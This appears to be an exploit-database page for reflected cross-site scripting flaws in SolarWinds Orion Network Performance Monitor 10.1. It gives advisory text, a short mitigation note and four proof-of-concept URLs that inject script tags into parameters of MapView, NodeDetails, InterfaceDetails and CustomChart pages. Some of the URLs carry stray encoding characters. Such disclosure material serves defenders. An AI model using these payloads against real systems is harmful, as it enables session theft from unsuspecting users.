header-logo
Suggest Exploit
vendor:
Orion Network Performance Monitor (NPM)
by:
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: Orion Network Performance Monitor (NPM)
Affected Version From: SolarWinds Orion Network Performance Monitor (NPM) 10.1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:solarwinds:orion_network_performance_monitor:10.1
Metasploit:
Other Scripts:
Platforms Tested:

SolarWinds Orion NPM Multiple Cross-Site Scripting Vulnerabilities

SolarWinds Orion NPM is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate these vulnerabilities, it is recommended to apply the latest security patches provided by SolarWinds. Additionally, users should be cautious when clicking on suspicious links and ensure they are running the latest version of SolarWinds Orion NPM.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45257/info

SolarWinds Orion NPM is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

SolarWinds Orion Network Performance Monitor (NPM) 10.1 is vulnerable; other versions may also be affected. 

http://www.example.com/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-231270=0225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E

http://www.example.com/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E

http://www.example.com/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%2=7test%27%29%3C/script%3E&I:100&view=InterfaceDetails

http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo=

Navigation

Suggest Exploit

Services By CQR